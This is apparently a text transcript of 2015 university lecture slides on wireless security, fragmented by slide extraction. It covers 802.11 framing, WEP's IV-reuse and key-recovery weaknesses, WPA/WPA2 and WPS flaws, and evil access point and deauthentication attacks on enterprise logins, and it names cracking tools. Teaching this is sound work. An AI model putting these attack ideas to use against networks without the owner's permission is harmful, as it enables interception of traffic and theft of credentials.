Transcript Slides
Computer security 2015 –Ýmir Vigfússon
Based on slides by Björn@Syndis, Roy Werber, Pascal Meunier@Purdue,
material from Computer Networking: A Top Down Approach Featuring the Internet,
Jim Kurose, Keith Ross, Addison-Wesley
200
802.11n
Data rate (Mbps)
54
802.11a,g
5-11
802.11b
4
1
802.11a,g point-to-point
data
802.16 (WiMAX (4G?))
3G cellular
enhanced
UMTS/WCDMA-HSPDA, CDMA2000-1xEVDO
802.15
.384
3G
UMTS/WCDMA, CDMA2000
.056
2G
IS-95, CDMA, GSM
NFR
Indoor
Outdoor
10-30m
50-200m
Mid-range
outdoor
Long-range
outdoor
200m – 4 Km
5Km – 20 Km
How does wireless differ from wired settings?
Base stations relay traffic between wireless and
wired networks
Cell towers
Access points
...
Infrastructure mode
vs. ad-hoc
No base stations
network
infrastructure
Basic service set (BSS)
A.k.a. “cell“
Internet
Set of wireless hosts
In infrastructure-mode,
also base station
In ad-hoc mode, hosts
relay for each other
Interesting research
AP
hub, switch
or router
BSS 1
AP
questions ...
BSS 2
Genesis of a wireless/WiFI network
JOIN ME Beacon!!!
I have powerful signal!
I am called Secure! (SSID)
My MAC address is
00:de:ad:be:ef:00 (BSSID)
I encrypt .. or not
Genesis of a wireless/WiFI network
... and a WLAN is born
Afterward, may authenticate, run DHCP, etc.
2.4 GHz – 2.485 GHz divided into 11 channels
Each is a band. How would you share bandwidth?
Share band, Carrier Sense Multiple Access (CSMA)
Instead of just dividing frequency or time slots among
users, 802.11 uses Code Divison Multiple Access (CDMA)
Optional: CSMA-CA: Collision Avoidance
Short Req-to-Send (RTS) messages to reserve channel
Base station (access point) decides „Clear-to-Send“ (CTS)
A
Access Point
B
reservation collision
DATA (A)
time
defer
Suppose you‘re in charge of designing the first
wireless protocol for the masses, 802.11.
How would you make it backward compatible?
Application protocol
Application
Application
TCP protocol
Transport
Transport
Network
IP protocol
IP
IP protocol
Network
Link
Data
Link
Network
Access
Data
Link
Link
Strive to replace only the lowest layer: link layer
In regular networks, this is usually Ethernet
Link Layer
frame
IP Header
ETH IP TCP
Link (Ethernet)
Header
data
ETF
Link (Ethernet)
Trailer
Let‘s try to encapsulate it with the information
that we need
Who we are
What access point we‘re talking to
Encryption?
2
2
6
6
6
frame
address address address
duration
control
1
2
3
Address 1: MAC address
of wireless host or AP
to receive this frame
2
Sequence No.: needed for ARQ
(ACK required) mode.
6
4
0 - 2312
address
seq
4
control
payload
CRC
Address 4: MAC address
of wireless relay host (ad hoc
networks only)
Address 3: MAC address of router interface to
which AP is attached
[Serves as Ethernet destination address]
Address 2: MAC address
of wireless host or AP
transmitting this frame
[Serves as Ethernet source address]
Internet
R1 router
H1
AP
R1 MAC addr
dest. address
H1 MAC addr
source address
802.3 (Ethernet) frame
AP MAC addr
address 1
1st dest (AP)
H1 MAC addr
address 2
source
R1 MAC addr
address 3
2nd dest (eth)
802.11 (WiFi) frame
frame seq #
(for reliable ARQ)
duration of reserved
transmission time (RTS/CTS)
2
2
6
6
6
frame
address address address
duration
control
1
2
3
2
Protocol
version
6
2
address
seq
4
control
2
4
1
1
1
1
Type
Subtype
To
AP
From
AP
More
frag
Retry
frame type
(RTS, CTS, ACK, data)
4
0 - 2312
payload
1
1
Power More
mgt
data
CRC
1
1
WEP
Rsvd
How would you attack this protocol?
We can hinder communication (Denial-of-Service)
We can hijack and modify connections
We can pretend to be whoever we want (spoofing)
...
Effectively no security measures are being taken
What can we do to enhance security?
Authentication:
How do we know a user is who he says she is?
▪ Username/Password? PIN? SmartCard? Two-factor?
▪ Usually a binary (yes/no) process
Authorization:
How do we establish what an authorized user should and
shouldn’t be able to do?
▪ Administrator? Customer? On a free trial?
▪ Groups/Roles/Privileges/Permissions
Access control:
How do we enforce that resources are only accessed by
authorized users?
▪ Implemented through logic, permissions, access lists, etc.
First, let‘s optionally authenticate users
Second, let‘s at least try to to encrypt every packet
How do we do that?
Unless we want an open network, we‘re going to
have to share a key
Later, we should have key management!
How would you implement this?
At the time WEP was defined, export restrictions
limited cryptography, so 64-bit RC4 was used
Extensions later for for 128-bit WEP
What about authentication with shared key?
First idea:
Client sends authentication request with key
Access point responds with ACCEPT if key correct
Second idea:
Client sends num and hash(num | key)
Access point also computes hash, ACCEPTS if
it likes the outcome
Third idea:
Client sends intention to authenticate
Access point sends back a random number (nonce) x
Client computes hash(x | key), sends to access point
Access point sends ACCEPT if matches local hash(x | key)
This is used in WEP
Called 4-step challenge-response handshake
Avoids disclosing the (static) key
Prevents replay attack (“pass-the-hash“)
Same input key
=
same output
Ideally, want to encrypt our communications
(“plaintext”) with a long, long string (“key”).
How would you store the key? Need it to be generated
Key
D
B
LE
R
E
P
H
Pseudo-random
number generator
Stream cipher Z
E
P K
X B
O ...
ZT AJ W
R Q
Idea: Just use the WEP key as input to the PRNG
then XOR with plaintext
What’s the problem?
Idea: Use num | WEP key as input instead, share
num as part of packet
This is used in the original WEP!
num is called an “Initialization Vector” (IV)
Basic idea behind WEP encryption
RC4: Streaming cipher algorithm
Why Initialization Vector (IV)?
Prevents reuse of keys
Also need a checksum (ICV) to avoid malicious bit
flips
CRC
802.11 Frame
Header
Payload
Payload
ICV
3
2
ICV computed – 32-bit CRC of payload
ICV = Integrity Check Value checksum
4 x 40
Key 1
Keynumber
Key 2
Key 3
Key 4
Key
40
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV = Initialization vector
IV
keynumber
24
8
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV selected – 24-bits, prepended to keynumber
64
IV
Key
Payload
ICV
RC4
Payload
ICV
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV selected – 24-bits, prepended to keynumber
IV+key used to encrypt payload+ICV
WEP Frame
Header
IV
keynumber
Payload
ICV
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV selected – 24-bits, prepended to keynumber
IV+key used to encrypt payload+ICV
IV+keynumber prepended to encrypted
payload+ICV
4 x 40
Key 1
Keynumber
Key 2
Key 3
Key 4
Keynumber is used to select key
Key
40
64
IV
Key
Payload
ICV
RC4
Payload
Keynumber is used to select key
IV+key used to decrypt payload+ICV
Done!
ICV
IV (Initialization vector) is 24 bits long
How many seeds for random number generators?
Only 16 million different RC4 cipher streams per key
If an IV is ever reused, XOR between packets
equivalent to XOR of plaintext messages
C = cipher text, P = plain text:
C1 C2 = (P1 IV) (P2 IV) = P1 P2
If you guess one plain text message, you obtain another
How long until we expect a reused IV?
Remember class about DNS birthday attacks?
23 people in a room
How likely that two people
share the same birthday?
For 𝑚 people and 𝑛 days, the
probability is about 1 − 𝑒
𝑚2
−
2𝑛
Roughly:
Answer: 50.7%!
Here, n = 16M, so:
50% chance of collision after only 4,823 packets!
99% chance of collision 12,430 packets
If network is operating at 11Mbps, takes 3 seconds
Start listening in on traffic, gradually obtaining all
16M IVs to be fully authenticated
More worrying: Fluhrer, Martin, Shamir attack
Passive attack against RC4 in WEP to recover RC4 key
one letter at a time! Implemented in aircrack-ng
Can inject data to network to speed up attack
Online demo of a WEP crack using airsnort
https://www.youtube.com/watch?v=_G4kOaJqMOE
Remember: Do NOT use any hacking software
without express permission from the owner of the
network you are attacking.
It was quickly realized that WEP offered lax security.
WEP was decommissioned in 2004
Teams from Wi-Fi Alliance set-up to think of two
solutions for Protected Access (WPA)
Backward compatible: WPA-TKIP
Stopgap solution for WEP that could be flashed as firmware on
to existing infrastructure
(i) Uses a key mixing function between IV and key
(ii) Adds message integrity checks (MIC) instead of ICV of
CRC32 (cryptographically insecure)
Attack (2008): Inject 7 packets to a wireless client
Forward thinking: WPA2
Implemented more elaborate 4-way handshake and
group key handshake
Supports TKIP, CCMP, etc.
WPA2 Personal: Pre-shared key between people
WPA2 Enterprise: Connect to a RADIUS server
▪ Tedious to set up. Also means that if your WiFi credentials are
compromised, your whole account will be too.
2012: Flaw in WPS – the device configuration tool for
routers that uses a PIN for fast access.
▪ Even when disabled, obtains shared key in about 7 hours
Key sharing still vulnerable to handshake capture
WEP, WPA-TKIP, WPA2-PSK – PSK = Pre-Shared Key
Cracking the hashes depends on password strength and -
can take a long time
Rainbow tables accelerate the process (coWPAtty)
http://www.renderlab.net/projects/WPA-tables/
Does take long(er) to crack
WPA2 Enterprise / WPA-802.1x
Mostly used in corporate or larger wifi environments
A Radius server acts as an authentication server
Uses EAP or “Extensible Authentication Protocol”
which handles the actual authentication
Very few setups use EAP-TLS
▪ Considered most secure variant of EAP
Most setups use EAP-PEAP or something less secure
Probe Response
SSID: SuperSecure
ENC: WPA2-Enterprise
Deauth attack
4 way handshake
authentication
- User name
Probe Requests
-
Password (MSCHAPv2)
Many devices send authenticating information
without doing any verification of certificates.
Some people even setup their devices in this way.
Several phone manufacturers
Even Linux distributions
Need to be in range of the device to capture the
encrypted password
The default setting for most devices is, however,
to ask the user to accept the modified certificate
Built on
Evil access point/hotspot idea
The fact most devices connect to multiple networks
The idea
We know NICs continually scan and sens probe requests
What if we send broadcast requests for a million SSIDs?
If a device has connected before, will I get a response ?
Widespread risk
Applies to those that use traditional Wi-Fi networks
Also applies to singular devices and non AP networks
Broadcast SSIDs
- Hot Spot
- Guests
- Free WiFi
- xfinitywifi
- ETC
- ....
(OPN, WEP, WPAPSK)
Association
request á SSID:
gestir
Confidentiality:
Record authentication handshakes (WEP, WPA, WPA2)
Record and log traffic remotely (leaks)
Lure people to fake access points
Integrity:
Record packets, then replay, modify and inject them
Availability:
Easy to jam frequencies. Turn on the microwave oven...
Accountability:
Attacker can remain fully anonymous
Attacker can spoof and frame others